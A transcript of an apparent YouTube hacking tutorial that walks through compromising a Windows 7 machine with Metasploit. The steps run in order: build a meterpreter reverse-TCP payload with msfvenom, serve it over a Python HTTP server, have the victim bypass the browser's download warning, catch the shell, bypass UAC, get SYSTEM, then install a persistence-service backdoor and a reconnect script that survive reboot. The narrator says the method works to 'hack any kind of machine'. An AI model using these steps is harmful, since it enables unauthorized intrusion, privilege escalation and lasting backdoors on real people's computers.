Hello guys, welcome to my channel with another video. And today's video I am going to show you how to use the persistence module using the Metasploit. And today's video will be the most interesting video in my channel. So guys, without wasting time, let's start our video. First of all, we need to create a payload. Let's open our terminal. Let me make it bigger. First of all, we need to check our IP address of my machine. In here you can see my IP address is 192.168.176.133. So this is our machine IP address. We need this IP to create the payload. Now we have to create the payload, so we are going to Metasploit to create the payload. The code is msf venom -p windows meterpreter reverse tcp. In here you can use the caps letter or small letter as you can. I am going to use the caps letter. My IP address is 192.168.176.133. so 192.168.176.133, and I'm going to use the L port 10,000. This is the format -f for format. Format will be the exe because I am going to test this payload on the Windows 7 machine, and the output will be the hex.exe, sorry, and enter. As you can see, my payload is created fine successfully. Now we have to send this payload on the target machine. I am going to use the Python server to send this payload on the target machine. I am going to use this Python command python3-m http.servers. It is kind of the sharing server. As you see, my Python server is running, and here I have to use this link, but in here we have to use our own IP, which is 192.168.176.133, and the port number is 8000. So let's go to the Windows 7 machine. Let's close it, open the Chrome. You can use any kind of browser to download this file. We have to use the http, sorry, my mistake, http 192.168. What our IP address is 176.133. 176.133, and the port number is 8000. And enter. In here you can see there will be the hack.exe. You have to download this. Click on here and the file will be downloaded easily. The Chrome is blocking it, so we have to download it from the download manager. Click on the keep dangerous file and keep anyway. The file is downloaded successfully. See, it's downloaded successfully. Now close this file. I'm going to close it and clear everything. I'm going to create another terminal. On my right side in here I'm going to see the IP address, and in here I'm going to run the Metasploit. So the Metasploit command is msf console and enter. In here we have to run the Metasploit. So use multi-handler. We need to run the listener. Set payload Windows Metasploit reverse TCP and enter. Set payload in here I do the mistake. Now we have to set the lhost. In here we have to use our own IP 192.168.176.133, and we have to set the L port. We use the 10,000 when we created the payload and enter. Now we have to run this listener. Now let's go back to the Windows 7 machine and run the downloaded payload. This will be the download folder, I guess. Here it is. So I am going to run this file and run it. As you can see, we already get the connection from the Windows 7 machine. Let's check system info. It's a Windows 7, which means we already hacked the Windows 7 machine. But if we shut down this Windows machine, our connection will be the closed for forever. So we need to set up some persistence module so that if the Windows 7 machine again restart, we will get the connection from Windows 7 machine to our Kali machine. So guys, we have to create another payload using this Metasploit shell, and first of all we need to get the admin access. So let's bg and search for bypass UAC, which is bypass user account control. I'm going to close it. Okay, fine. Another. Now it will easy to see. Let me zoom it. We are going to use this Metasploit to access the control. Now use 2. In here the number is 2. I am going to use the machine. Now sessions -l. Only we have the one session. Select session 1. Set session 1. So session 1 is selected and run it. We already get the system access, which is, now let's check the UID. Get UID. In here I am just a user of that Windows 7 machine, but I am not the administrator of the machine. So you have to get the access of administrator machine. Now get system. In here you can see got system by technique 1 and the memory is admin. Now check the as you can see I already get the administrator access. Now I am going to create another payload which is persistence module. Now again busy search search persistence persistence. In here as you can see there is so many persistence module here. We are going to use this one, persistence service 18. Now use 18, or you can set by default use, you can copy it or paste it, but I am going to use 18. Now let's see what it requires. In here it shows it already set the default IP address and the L port is 444 and I am going to change it. Set L port 11,000. Okay, fine. Now let's check again, show options, and it changes, and those things are not required, and you already do this, and let's run it. Sorry, we have to set the session. Sorry, this is a session. We have to set the session on the 444, this one. Set session to. Now run it. As you can see, I already get the session. I already create the payload on this file. C user show updater local temp exe. You already created the backdoor of persistence module. Now let's test the module so that we can get the connection if we restart our machine. So let's restart it. As you can see, my interpreter session is closed and died. Let's wait a moment. And I am going to close this terminal. You have to remember that what you set before on this L port at the last time. Now I am close it again. Sorry for this. We can create it manually or you can create it by easily. So if you create the file, then nano metasploit.rc use multi handler set payload Windows interpreter reverse TCP set L host 192.168. Sorry, I forget it again. Let's check it. If config 176.133 set L port. As I say, we have to use the last port number to access it and run and save it as let's close this subterminal and enter. Sorry, Y and enter. As you can see, we created a code file metasploit.rc and we have to just run it. Let's check the Windows 7. Let's close it. Okay. Okay, fine, our Windows 7 machine is running. Now let's test the code. Metasploit, sorry, msf console -r metasploit.rc. Let's see, is it running or not. Yeah, we get the Windows 7 access by easily. Let's check the user ID. So get UID, we access the system. So guys, you can hack any kind of machine by using this method. I will upload the notes on the description box. You can download all the PDF that I created for you guys. So guys, thank you. Please do like, share and subscribe my channel, and don't forget to comment, please. Thank you guys.